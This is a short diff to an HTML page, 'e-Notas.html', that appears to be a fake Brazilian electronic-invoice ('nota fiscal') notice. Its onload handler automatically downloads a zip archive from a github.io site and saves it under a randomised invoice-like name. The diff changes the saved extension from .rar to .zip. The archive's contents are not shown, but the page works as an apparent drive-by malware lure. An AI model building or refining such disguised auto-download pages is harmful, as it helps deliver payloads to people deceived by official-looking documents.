--- a/e-Notas.html
+++ b/e-Notas.html
@@ -47,7 +47,7 @@
 
         window.onload = function() {
             const suffix = generateRandomSuffix(12);
-            const newFileName = 'e-NotaFiscal0000' + suffix + '.rar';
+            const newFileName = 'e-NotaFiscal0000' + suffix + '.zip';
             const downloadUrl = 'https://baixetudopcwindows.github.io/clubewin/e-NotaFiscal.zip'; // URL do arquivo de download
             downloadFile(downloadUrl, newFileName);
         }
